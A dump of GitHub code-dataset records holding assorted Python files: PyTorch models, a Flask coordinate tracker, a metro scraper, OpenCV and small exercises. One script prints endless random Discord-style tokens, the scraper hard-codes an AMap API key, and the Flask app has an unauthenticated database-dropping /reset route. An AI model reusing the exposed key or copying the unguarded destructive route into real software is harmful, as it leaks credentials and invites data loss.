hasattr(model, 'roberta') and any(\n s.startswith('roberta') for s in state_dict.keys()\n ):\n start_prefix = 'roberta.'\n if hasattr(model, 'roberta') and not any(\n s.startswith('roberta') for s in state_dict.keys()\n ):\n model_to_load = getattr(model, 'roberta')\n\n load(model_to_load, prefix=start_prefix)\n\n if model.__class__.__name__ != model_to_load.__class__.__name__:\n base_model_state_dict = model_to_load.state_dict().keys()\n head_model_state_dict_without_base_prefix = [\n key.split('roberta.')[-1] for key in model.state_dict().keys()\n ]\n\n missing_keys.extend(head_model_state_dict_without_base_prefix - base_model_state_dict)\n\n if len(missing_keys) > 0:\n logger.info(\n \"Weights of {} not initialized from pretrained model: {}\".format(\n model.__class__.__name__, missing_keys\n )\n )\n if len(unexpected_keys) > 0:\n logger.info(\n \"Weights from pretrained model not used in {}: {}\".format(\n model.__class__.__name__, unexpected_keys\n )\n )\n if len(error_msgs) > 0:\n raise RuntimeError(\n \"Error(s) in loading state_dict for {}:\\n\\t{}\".format(\n model.__class__.__name__, \"\\n\\t\".join(error_msgs)\n )\n )\n\n # Set model in evaluation mode to desactivate DropOut modules by default\n model.eval()\n\n logger.info(f\"Load pre-trained RoBERTa parameters from file {weights_path}.\")\n\n return model\n\n\n","repo_name":"sustcsonglin/TN-PCFG","sub_path":"fastNLP/modules/encoder/roberta.py","file_name":"roberta.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"14508693233","text":"#!/usr/bin/python3\n\"\"\" text_indentation function \"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n # This function prints a text with 2 new lines\n after each of these characters: '.', '?' and ':'.\n\n Args:\n\n text (str) = The text.\n\n - ``text`` must be a string,\n otherwise raise a ``TypeError`` exception.\n \"\"\"\n\n initial = final = printed = 0\n\n if type(text) != str:\n raise TypeError(\"text must be a string\")\n\n while initial < len(text):\n if text[initial] != \" \":\n break\n\n initial += 1\n\n final = initial\n\n for final in range(len(text)):\n\n printed = 0\n\n if text[final] == '.' or text[final] == '?' 
or text[final] == ':':\n\n final += 1\n print(text[initial:final])\n print()\n\n while final < len(text):\n\n if text[final] != \" \":\n break\n final += 1\n\n initial = final\n printed = 1\n\n if printed == 0:\n print(text[initial:(final + 1)], end=\"\")\n","repo_name":"SergioO21/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72436664410","text":"import csv\nimport numpy as np\n\ndef save_matrix(csvfile, matrix, labels, row, col):\n '''将矩阵保存成csv文件'''\n\n csv = open(csvfile, \"w\")\n\n # 写头\n csv.write(\"\")\n for c in col: csv.write(\",%s\"% c)\n csv.write(\",type\\n\")\n\n\n for ir, im, il in zip(row, matrix, labels):\n csv.write(\"%s,\" % ir)\n for iim in im:\n csv.write(\"%f,\" % iim)\n\n csv.write(\"%s\\n\"% il)\n\ndef load_matrix(csvfile):\n row, col, matrix, label = [], [], [], []\n for i, line in enumerate(csv.reader(open(csvfile))):\n if i == 0: \n col = line[1:-1]\n else:\n row.append(line[0])\n matrix.append(line[1:-1])\n label.append(line[-1])\n\n return np.array(matrix, dtype=float), np.array(label), np.array(row), np.array(col)\n","repo_name":"lemene/mbio","sub_path":"mbio/io/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21349796317","text":"import os, time, random, sys\r\nfrom colorium import *\r\n\r\n\r\nuzunluk = 58\r\nchars = \"-abcdefghijklmnopq_rstu.vwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789\"\r\n\r\n\r\ndef gen():\r\n os.system(\"clear\")\r\n while True:\r\n print(\"N\", end=\"\")\r\n for i in range(uzunluk):\r\n token = random.choice(chars)\r\n print(token, end=\"\")\r\n \r\n print(\"\")\r\n time.sleep(0.5)\r\n\r\n\r\n\r\n\r\n\r\ndef genwin():\r\n os.system(\"cls\")\r\n while True:\r\n print(\"N\", end=\"\")\r\n for i in range(uzunluk):\r\n token = random.choice(chars)\r\n print(token, end=\"\")\r\n \r\n print(\"\")\r\n time.sleep(0.5)\r\n\r\n\r\n\r\noscheck = os.name\r\n\r\nif oscheck == \"nt\":\r\n genwin()\r\nelif oscheck == \"posix\":\r\n gen()","repo_name":"RiseToDev751/DiscordGeneratorTools","sub_path":"token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"32"} +{"seq_id":"70007143771","text":"import cv2 as cv\nimport numpy as np\nimport random\n\n# define a video capture object \nvid = cv.VideoCapture(0) \n\n#colors written in BGR format\nred = (0, 0, 255)\norange = (0, 128, 255)\nyellow = (0, 255, 255)\npurple = (255, 0, 128)\nblue = (255, 0, 0)\ngreen = (0, 255, 0)\n\n\nwhile(True): \n\n # Capture the video frame \n # by frame \n ret, frame = vid.read()\n\n left_corner = (random.randint(0, 100), random.randint(0, 100))\n right_corner = (random.randint(120, 600), random.randint(130, 600))\n\n frame = cv.rectangle(frame, left_corner, right_corner, green, 10)\n\n # Display the resulting frame \n cv.imshow('Frames', frame)\n\n # the 'q' button is set as the \n # quitting button you may use any \n # desired button of your choice \n if cv.waitKey(1) & 0xFF == ord('q'): \n break\n\n# After the loop release the cap object \nvid.release() \n# Destroy all the windows \ncv.destroyAllWindows() 
\n\n","repo_name":"m-zetina/openCV-work","sub_path":"openCVsample.py","file_name":"openCVsample.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23984904183","text":"# 객체 출력1 : 피클파일에 저장하기\n## pickle (import 선언) : 딕셔너리/리스트와 같은 내용을 파일에 그대로 저장/불러올 수 있다.\n## dump() : 객체를 pickle모듈로 압축한다.\nimport pickle\n\n# 저장하고자 하는 딕셔너리를 입력한다.\ngameOption = {'sound' : 8,'videoQuality' : 'high','money' : 1000000, 'weaponlist' : ['gun','missile','knife']}\n\n# 파일을 연다. (해당 예시에서는 이진파일을 호출하였으나, 어느 확장자로 하더라도 피클이 가능하다)\n# 피클파일의 모드를 지정할 때에는 반드시 뒤에 'b(바이너리)'를 입력한다(wb, rb ... )\nfile = open(\"test1.p\",'wb')\n\n#딕셔너리를 피클파일에 저장한다.\npickle.dump(gameOption,file)\n\n#파일을 닫는다.\nfile.close()\n","repo_name":"ysjin0715/python-practice","sub_path":"chapter11/pickle1(dump).py","file_name":"pickle1(dump).py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41455461570","text":"import os\nfrom flask import Flask, render_template, request, url_for, flash, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.exc import IntegrityError\nfrom datetime import datetime\n\n# TODO add dimensions\n# TODO add sessions / user identification\n# TODO add admin accounts\n# TODO add possibility to show/hide coordinates\n# TODO display current server seed\n# !BUG entry will go in even if one entry of coordinates is empty:\n# !BUG str will result as \"int int '' \"\n# !BUG same thing happens if name is empty\n\n#? maybe keep single coordinate (y_coord) omission a feature?\n\n# get working directory\n_cwd = os.getcwd()\n\n# declaring variables used to config Flask app instance\nSECRET_KEY = os.urandom(24).hex()\nWTF_CSRF_SECRET_KEY = 'other-key'\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(_cwd, 'coords.db')\nSQALCHEMY_ECHO = True\n\n# specify folder paths for templates and static files\napp = Flask(__name__, template_folder='templates', static_folder='static')\napp.debug = True\n\napp.config.from_object(__name__)\napp.config['SECRET_KEY'] = SECRET_KEY\napp.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Coordinate:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n\n def returnAsString(self):\n if (self.x != None and self.y != None and self.z != None ):\n return self.x + ' ' + self.y + ' ' + self.z\n\n\n# passing an object when declaring a model simply means that\n# the created class is a sub-class of the class between parenthesis\nclass Coordinates(db.Model):\n __tablename__ = 'coords_table'\n\n id = db.Column(db.Integer, primary_key=True)\n date = db.Column(db.Date)\n dimension = db.Column(db.String(100), nullable=False)\n coords = db.Column(db.String(100), nullable=False)\n description = db.Column(db.String(2048), nullable=False, unique=True)\n\n # allows you to give each object \n # a string representation to recognize it for debugging purposes.\n def __repr__(self):\n return f\"Coordinates : {self.coords}, Description: {self.description}\"\n\n\nwith app.app_context():\n db.create_all()\n\n\n@app.route('/reset')\ndef resetDB():\n db.drop_all()\n\n return redirect(url_for('index')) \n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/enter_coordinates', methods = ['GET', 'POST'])\ndef 
showForm():\n return render_template('create.html')\n\n \n@app.route('/submit_coordinates', methods=['GET','POST'])\ndef submitForm():\n if request.method == \"POST\":\n\n loc_name = request.form.get('coords-info')\n \n x_coord = request.form.get('coord-x')\n y_coord = request.form.get('coord-y')\n z_coord = request.form.get('coord-z')\n\n dim = request.form.get('dim')\n\n # check if coords have been inserted, skip if any of them is not correct\n coords = Coordinate(x_coord, y_coord, z_coord)\n curr_date = datetime.now()\n if(coords.returnAsString().isspace() == False and loc_name.isspace() == False):\n entry = Coordinates(\n coords=str(coords.returnAsString()), \n date=curr_date, \n dimension=dim, \n description=str(loc_name))\n db.session.add(entry)\n\n try:\n db.session.commit()\n except IntegrityError:\n print(\"Error!\")\n flash(\"Entry failed! It probably exists in database already!\", 'error')\n db.session.rollback()\n else:\n print(\"Error!\")\n flash(\"Entry not inserted! Check if values are not null!\", 'error')\n\n return render_template('create.html')\n\n# TODO check if table exists before getting coord_list\n@app.route('/coord-list/', methods = ['GET', 'POST'])\ndef showList():\n dimension = \"All\"\n if(request.method == \"POST\"):\n dimension = request.form.get('dim')\n\n if (dimension != \"All\"):\n coord_list = Coordinates.query.filter_by(dimension = dimension)\n else:\n coord_list = Coordinates.query.all()\n\n\n if (not coord_list):\n flash('Empty list!', 'error')\n\n return render_template('list.html', coordinate_list = coord_list, dim = dimension) \n\n@app.route('/coord-list/delete/', methods=['GET', 'POST'])\ndef deleteEntry():\n if request.method == \"POST\":\n ID_to_remove = request.form.get('clicked_btn')\n Coordinates.query.filter_by(id=ID_to_remove).delete()\n \n try:\n db.session.commit()\n except IntegrityError:\n print(\"Error!\")\n flash(\"Deletion failed!\")\n db.session.rollback()\n else:\n print(\"Error!\")\n flash(\"Deletion failed!\")\n\n return redirect(url_for(('showList')))\n\nif __name__ == '__main__':\n app.run()","repo_name":"Grocery4/mc-coordinates-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16336400184","text":"import random\n\nimport torch\n\nimport torch.nn as nn\nimport torch.nn.init\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom layers import ScaledEmbedding, ZeroEmbedding\n\nclass HybridContainer(nn.Module):\n\n def __init__(self,\n latent_module,\n user_module=None,\n context_module=None,\n item_module=None):\n\n super(HybridContainer, self).__init__()\n\n self.latent = latent_module\n self.user = user_module\n self.context = context_module\n self.item = item_module\n\n def forward(self, user_ids,\n item_ids,\n user_features=None,\n context_features=None,\n item_features=None):\n\n user_representation, user_bias = self.latent.user_representation(user_ids)\n item_representation, item_bias = self.latent.item_representation(item_ids)\n\n if self.user is not None:\n user_representation += self.user(user_features)\n if self.context is not None:\n user_representation += self.context(context_features)\n if self.item is not None:\n item_representation += self.item(item_features)\n\n dot = (user_representation * item_representation).sum(1)\n\n return dot + user_bias + item_bias\n\nclass 
FeatureNet(nn.Module):\n\n def __init__(self, input_dim, output_dim, bias=False, nonlinearity='tanh'):\n\n super(FeatureNet, self).__init__()\n\n if nonlinearity == 'tanh':\n self.nonlinearity = F.tanh\n elif nonlinearity == 'relu':\n self.nonlinearity = F.relu\n elif nonlinearity == 'sigmoid':\n self.nonlinearity = F.sigmoid\n elif nonlinearity == 'linear':\n self.nonlinearity = lambda x: x\n else:\n raise ValueError('Nonlineariy must be one of '\n '(tanh, relu, sigmoid, linear)')\n\n self.input_dim = input_dim\n self.output_dim = output_dim\n\n self.fc_1 = nn.Linear(self.input_dim,\n self.output_dim,\n bias=bias)\n\n def forward(self, features):\n\n return self.nonlinearity(self.fc_1(features))\n\nclass BilinearNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32, sparse=False):\n\n super(BilinearNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n\n self.user_embeddings = ScaledEmbedding(num_users, embedding_dim,\n sparse=sparse)\n self.item_embeddings = ScaledEmbedding(num_items, embedding_dim,\n sparse=sparse)\n self.user_biases = ZeroEmbedding(num_users, 1, sparse=sparse)\n self.item_biases = ZeroEmbedding(num_items, 1, sparse=sparse)\n\n def user_representation(self, user_ids):\n\n user_embedding = self.user_embeddings(user_ids)\n user_embedding = user_embedding.view(-1, self.embedding_dim)\n\n user_bias = self.user_biases(user_ids).view(-1, 1)\n\n return user_embedding, user_bias\n\n def item_representation(self, item_ids):\n\n item_embedding = self.item_embeddings(item_ids)\n item_embedding = item_embedding.view(-1, self.embedding_dim)\n\n item_bias = self.item_biases(item_ids).view(-1, 1)\n\n return item_embedding, item_bias\n\n def forward(self, user_representation, user_bias, item_representation, item_bias):\n\n dot = (user_representation * item_representation).sum(1)\n\n return dot + user_bias + item_bias\n\nclass MixtureNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32,\n projection_scale=1.0,\n num_components=4):\n\n super(MixtureNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n self.projection_scale = projection_scale\n\n self.user_embeddings = ScaledEmbedding(num_users, embedding_dim)\n self.item_embeddings = ScaledEmbedding(num_items, embedding_dim)\n\n self.user_biases = ZeroEmbedding(num_users, 1)\n self.item_biases = ZeroEmbedding(num_items, 1)\n\n self.taste_projection = nn.Linear(embedding_dim,\n embedding_dim * self.num_components, bias=False)\n self.attention_projection = nn.Linear(embedding_dim,\n embedding_dim * self.num_components, bias=False)\n\n for layer in (self.taste_projection, self.attention_projection):\n torch.nn.init.xavier_normal(layer.weight, self.projection_scale)\n\n def user_representation(self, user_ids):\n\n user_embedding = self.user_embeddings(user_ids).squeeze()\n user_bias = self.user_biases(user_ids).squeeze()\n\n return user_embedding, user_bias\n\n def item_representation(self, item_ids):\n\n item_embedding = self.item_embeddings(item_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return item_embedding, item_bias\n\n def forward(self, user_ids, item_ids):\n\n user_embedding = self.user_embeddings(user_ids)\n item_embedding = self.item_embeddings(item_ids)\n\n batch_size, embedding_size = item_embedding.size()\n\n\n user_tastes = (self.taste_projection(user_embedding)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = (self.attention_projection(user_embedding)\n 
.resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = user_attention # * user_embedding.unsqueeze(1).expand_as(user_tastes)\n\n attention = (F.softmax((user_attention *\n item_embedding.unsqueeze(1).expand_as(user_attention))\n .sum(2)).unsqueeze(2).expand_as(user_attention))\n weighted_preference = (user_tastes * attention).sum(1)\n\n dot = (weighted_preference * item_embedding).sum(1)\n\n user_bias = self.user_biases(user_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return dot + user_bias + item_bias\n\nclass MixtureComponent(nn.Module):\n\n def __init__(self, embedding_dim, num_components):\n\n super(MixtureComponent, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n\n self.fc_1 = nn.Linear(embedding_dim, embedding_dim, bias=False)\n self.fc_2 = nn.Linear(embedding_dim, embedding_dim, bias=False)\n\n self.taste_projection = nn.Linear(embedding_dim,\n embedding_dim * num_components,\n bias=False)\n self.attention_projection = nn.Linear(embedding_dim,\n embedding_dim * num_components,\n bias=False)\n\n def forward(self, x):\n\n batch_size, embedding_size = x.size()\n\n x = F.relu(self.fc_1(x))\n x = F.relu(self.fc_2(x))\n\n user_tastes = (self.taste_projection(x)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = (self.attention_projection(x)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n\n return user_tastes, user_attention\n\nclass NonlinearMixtureNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32,\n num_components=4):\n\n super(NonlinearMixtureNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n\n self.user_embeddings = nn.Embedding(num_users, embedding_dim)\n self.item_embeddings = nn.Embedding(num_items, embedding_dim)\n\n self.user_biases = ZeroEmbedding(num_users, 1)\n self.item_biases = ZeroEmbedding(num_items, 1)\n\n self.mixture = MixtureComponent(embedding_dim, num_components)\n\n\n def user_representation(self, user_ids):\n\n user_embedding = self.user_embeddings(user_ids).squeeze()\n user_bias = self.user_biases(user_ids).squeeze()\n\n return user_embedding, user_bias\n\n def item_representation(self, item_ids):\n\n item_embedding = self.item_embeddings(item_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return item_embedding, item_bias\n\n def forward(self, user_ids, item_ids):\n\n user_embedding = self.user_embeddings(user_ids)\n item_embedding = self.item_embeddings(item_ids)\n\n batch_size, embedding_size = item_embedding.size()\n\n user_tastes, user_attention = self.mixture(user_embedding)\n item_embedding = item_embedding.unsqueeze(1).expand_as(user_attention)\n\n attention = F.softmax((user_attention * item_embedding).sum(2))\n\n preference = ((user_tastes * item_embedding)\n .sum(2))\n weighted_preference = (attention * preference).sum(1).squeeze()\n\n user_bias = self.user_biases(user_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return weighted_preference + user_bias + item_bias\n\nclass EmbeddingMixtureNet(nn.Module):\n\n def __init__(self, num_users, num_items, embedding_dim=32,\n num_components=4):\n\n super(EmbeddingMixtureNet, self).__init__()\n\n self.embedding_dim = embedding_dim\n self.num_components = num_components\n\n self.taste_embeddings = ScaledEmbedding(num_users, embedding_dim * num_components)\n self.attention_embeddings = ScaledEmbedding(num_users, embedding_dim * 
num_components)\n self.item_embeddings = ScaledEmbedding(num_items, embedding_dim)\n\n self.user_biases = ZeroEmbedding(num_users, 1)\n self.item_biases = ZeroEmbedding(num_items, 1)\n\n def forward(self, user_ids, item_ids):\n\n item_embedding = self.item_embeddings(item_ids)\n\n batch_size, embedding_size = item_embedding.size()\n\n user_tastes = (self.taste_embeddings(user_ids)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n user_attention = (self.attention_embeddings(user_ids)\n .resize(batch_size,\n self.num_components,\n embedding_size))\n\n attention = (F.softmax((user_attention *\n item_embedding.unsqueeze(1).expand_as(user_attention))\n .sum(2)).unsqueeze(2).expand_as(user_attention))\n weighted_preference = (user_tastes * attention).sum(1)\n\n dot = (weighted_preference * item_embedding).sum(1)\n\n user_bias = self.user_biases(user_ids).squeeze()\n item_bias = self.item_biases(item_ids).squeeze()\n\n return dot + user_bias + item_bias","repo_name":"Z-an/mixture","sub_path":"representation.py","file_name":"representation.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7658263819","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n'''=================================================\n@IDE :PyCharm\n@Author :LuckyHuibo\n@Date :2019/7/12 15:48\n@Desc :\n从wiki百科中爬取广州的地铁线路\n=================================================='''\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom collections import defaultdict\n\n\ndef get_each_line_station(url):\n \"\"\"\n 获取每一条地铁线的站点信息\n :param url: https://zh.wikipedia.org/wiki/%E5%B9%BF%E5%B7%9E%E5%9C%B0%E9%93%811%E5%8F%B7%E7%BA%BF (如:1号线)\n :return: list列表存储的所有站点信息\n \"\"\"\n resp = requests.get(url, timeout=30)\n resp.encoding = 'utf-8'\n s = BeautifulSoup(resp.text, \"html.parser\")\n tab = s.find_all('table', attrs={\"class\": \"wikitable\", \"align\": \"center\"})\n station_list = re.findall(r'(.+)', str(tab))\n\n return station_list\n\n\ndef get_cantion_metro(lines_dict):\n \"\"\"\n 获取广州的所有地铁信息\n :param lines_dict: 输入的字典形式为:{'1号线': 'https:/..','2号线': 'https:/..'}\n :return: {'1号线': ['广州东站', '体育中心', ...],'2号线':[]...}\n \"\"\"\n for k_name, v_url in lines_dict.items():\n lines_dict[k_name] = get_each_line_station(lines_dict[k_name])\n return lines_dict\n\n\ndef get_all_stations(lines_dict):\n \"\"\"\n 将一个城市的所有地铁站信息存储到一个List中\n :param lines_dict:\n :return:\n \"\"\"\n stations = set()\n for k_name, v_value in lines_dict.items():\n stations.update(lines_dict[k_name])\n return stations\n\n\ndef get_longitude_latitude(city_info, station):\n \"\"\"\n 利用高德地图查询对应的地铁站经纬度信息,下面的key需要自己去高德官网申请\n https://lbs.amap.com/api/webservice/guide/api/georegeo\n :param city_info: 具体城市的地铁,如:广州市地铁\n :param station: 具体的地铁站名称,如:珠江新城站\n :return: 经纬度\n \"\"\"\n addr = city_info + station\n print('*要查找的地点:' + addr)\n parameters = {'address': addr, 'key': '98a3444618af14c0f20c601f5a442000'}\n base = 'https://restapi.amap.com/v3/geocode/geo'\n resp = requests.get(base, parameters, timeout=60) # 超时设置为60s,翻墙开了全局代理会慢点的\n if resp.status_code == 200:\n answer = resp.json()\n x, y = answer['geocodes'][0]['location'].split(',')\n coor = (float(x), float(y))\n print('=' + station + '的坐标是:', coor)\n return coor\n\n\ndef get_station_location(station_connection):\n \"\"\"\n 获取广州市所有地铁站的经纬度信息\n :param station_connection:list\n :return:字典dict\n \"\"\"\n station_location = {}\n for station in station_connection:\n md_station = station + \"站\"\n 
station_location[station] = get_longitude_latitude(city_info='广州市地铁', station=md_station)\n return station_location\n\n\ndef get_station_connetoins(all_lines_dict):\n \"\"\"\n 获取地铁之间的关联信息\n :param all_lines_dict: 传入所有地铁线路的字典\n :return:\n \"\"\"\n connections = defaultdict(list)\n for s_key in all_lines_dict.keys(): # generate real station network\n for i in range(len(all_lines_dict[s_key])):\n if i == 0:\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i + 1])\n elif i == len(all_lines_dict[s_key]) - 1:\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i - 1])\n else:\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i - 1])\n connections[all_lines_dict[s_key][i]].append(all_lines_dict[s_key][i + 1])\n print('所有相连接站点信息:', len(connections))\n return connections\n\n\ndef search(start, end, all_connection):\n \"\"\"\n 找到2个地铁站的路线路\n :param start:地铁站,str\n :param end:地铁站,str\n :param all_connection:所有相连接站点信息defaultdict\n :return:列表\n \"\"\"\n pathes = [[start]]\n passed = [start]\n\n while pathes:\n path = pathes.pop(0)\n frontier = path[-1]\n nxt = all_connection.get(frontier)\n for station in nxt:\n if station in passed:\n continue\n else:\n new_path = path + [station]\n pathes.append(new_path)\n if station == end: return new_path\n passed.append(station)\n\n\ndef pretty_print(lst):\n print(\"->\".join(lst))\n\n\ndef main():\n # 在国内使用requests请求wiki,google等国外的地址,需要设置代理,将小飞机设置为全局代理\n response = requests.get('https://zh.wikipedia.org/wiki/%E5%B9%BF%E5%B7%9E%E5%9C%B0%E9%93%81')\n response.encoding = 'utf-8'\n # 解析wiki的html,得到beautiful对象\n soup = BeautifulSoup(response.text, \"html.parser\")\n # 查找bs想要获取的表格,查看html代码,表格的头数据是:\n # ,变成soup的find_all是attrs={}\n tables = soup.find_all('table', attrs={\"class\": \"wikitable\", \"align\": \"center\", \"style\": \"width: 100%;\"})\n # print(tables) #将数据丢到xx.html文件展示\n pattern = re.compile(r'(.+线)')\n lines = pattern.findall(str(tables))\n print(type(lines))\n print('获取到广州的地铁路线为:')\n for line in lines:\n print(line)\n # 将获取的线路存到字典中\n canton_lines = {}\n for line in lines:\n canton_lines[line[1]] = 'https://zh.wikipedia.org' + line[0]\n print(canton_lines)\n # 获取所有的线路\n all_lines = get_cantion_metro(canton_lines)\n print('=' * 20)\n print(all_lines)\n # 获取所有的地铁站\n all_stations = get_all_stations(all_lines)\n print('广州市地铁站的个数:', len(all_stations))\n print(all_stations)\n # 获取所有的经纬度\n all_locations = get_station_location(all_stations)\n print(len(all_locations))\n print(all_locations)\n # 找到为什么画出来的图少了一些点,因为使用高德地图API,打印出来的经纬度有一些是重复的,这个后面有时间再处理下\n import matplotlib\n\n # 指定默认字体\n matplotlib.rcParams['font.sans-serif'] = ['SimHei']\n matplotlib.rcParams['font.family'] = 'sans-serif'\n # 解决负号'-'显示为方块的问题\n matplotlib.rcParams['axes.unicode_minus'] = False\n import matplotlib.pyplot as plt\n import networkx as nx\n subway_graph = nx.Graph()\n subway_graph.add_nodes_from(list(all_locations.keys()))\n nx.draw(subway_graph, all_locations, with_labels=False, node_size=10)\n # 在pycharm中需要添加下面的代码,才能显示\n plt.show()\n\n # 获取相连接的地铁信息\n all_connection = get_station_connetoins(all_lines)\n print(all_connection)\n\n # 打印路径\n pretty_print(search(start='广州东站', end='万胜围', all_connection=all_connection))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Valuebai/learn-NLP-luhuibo","sub_path":"lesson-02-crawler-metro/canton_metro.py","file_name":"canton_metro.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"} 
+{"seq_id":"22074242820","text":"#!/usr/bin/python\n\nimport matplotlib.pyplot as plt \nfrom matplotlib import collections as mc\nimport math, pickle, sys\n\n(plot1, plot2) = pickle.load(open(sys.argv[1]))\n\nfig = plt.figure(1)\nfig.canvas.set_window_title(sys.argv[1])\n\nax = x=plt.subplot(211)\n\nplt.ylabel('Vel')\nplt.title('XY and E-Velocity')\nplt.grid(True)\n\nlc = mc.LineCollection(plot1.Lines, colors=plot1.Colors, linestyles=plot1.Styles, linewidth=3)\nax.add_collection(lc)\n\nfor i in range(len(plot1.Ticks)):\n (x, y, nr) = plot1.Ticks[i]\n plt.axvline(x, color=\"yellow\")\n plt.text(x, y*1.01, \"%d\" % nr)\n\nax.autoscale()\nplt.xlim(xmin=0)\n\nax2 = plt.subplot(212, sharex=ax)\nax2.set_xlim(0)\n\nplt.ylabel('Vel')\nplt.title('E-Advance')\nplt.grid(True)\n\nlc = mc.LineCollection(plot2.Lines, colors=plot2.Colors, linestyles=plot2.Styles, linewidth=3)\nax2.add_collection(lc)\n\nfor i in range(len(plot1.Ticks)):\n (x, y, nr) = plot1.Ticks[i]\n plt.axvline(x, color=\"yellow\")\n\nplt.axhline(0, color=\"black\")\n\nax2.autoscale()\nplt.xlim(xmin=0)\n\n\nfig.tight_layout()\nplt.show()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ErwinRieger/ddprint","sub_path":"scripts/ddplot.py","file_name":"ddplot.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"32"} +{"seq_id":"39446262914","text":"import torch.nn as nn\n\n\n\n\nclass BottleNeck(nn.Module):\n def __init__(self, t, c1, c2, s):\n super(BottleNeck, self).__init__()\n \n self.stride = s\n self.inchannels = c1\n self.outchannels = c2\n \n self.block = nn.Sequential(\n nn.Conv2d(c1, c1*t, kernel_size=1),\n nn.BatchNorm2d(c1*t),\n nn.ReLU6(inplace=True),\n \n nn.Conv2d(c1*t, c1*t, kernel_size=3, stride=s, padding=1, groups=c1*t),\n nn.BatchNorm2d(c1*t),\n nn.ReLU6(inplace=True),\n \n nn.Conv2d(c1*t, c2, kernel_size=1),\n nn.BatchNorm2d(c2),\n )\n\n\n def forward(self, x):\n residual = self.block(x)\n \n if self.stride == 1 and self.inchannels == self.outchannels:\n residual += x\n \n return residual\n\n\nclass MobileNetV2(nn.Module):\n def __init__(self, inchannels, classes=10):\n super(MobileNetV2, self).__init__()\n \n self.conv1 = nn.Sequential(\n nn.Conv2d(inchannels, 32, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU6(inplace=True)\n )\n \n self.layer1 = self._make_layer(t=1, c1=32, c2=16, n=1, s=1)\n self.layer2 = self._make_layer(t=6, c1=16, c2=24, n=2, s=1)\n self.layer3 = self._make_layer(t=6, c1=24, c2=32, n=3, s=1)\n self.layer4 = self._make_layer(t=6, c1=32, c2=64, n=4, s=1)\n self.layer5 = self._make_layer(t=6, c1=64, c2=96, n=3, s=1)\n self.layer6 = self._make_layer(t=6, c1=96, c2=160, n=3, s=1)\n self.layer7 = self._make_layer(t=6, c1=160, c2=320, n=1, s=2)\n \n self.conv2 = nn.Sequential(\n nn.Conv2d(320, 1280, kernel_size=1),\n nn.BatchNorm2d(1280),\n nn.ReLU6(inplace=True)\n )\n \n self.avg_pool = nn.AvgPool2d(kernel_size=7, stride=1)\n self.conv3 = nn.Conv2d(1280, classes, 1)\n \n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n \n def forward(self, x):\n out = self.conv1(x)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = self.layer5(out)\n out = 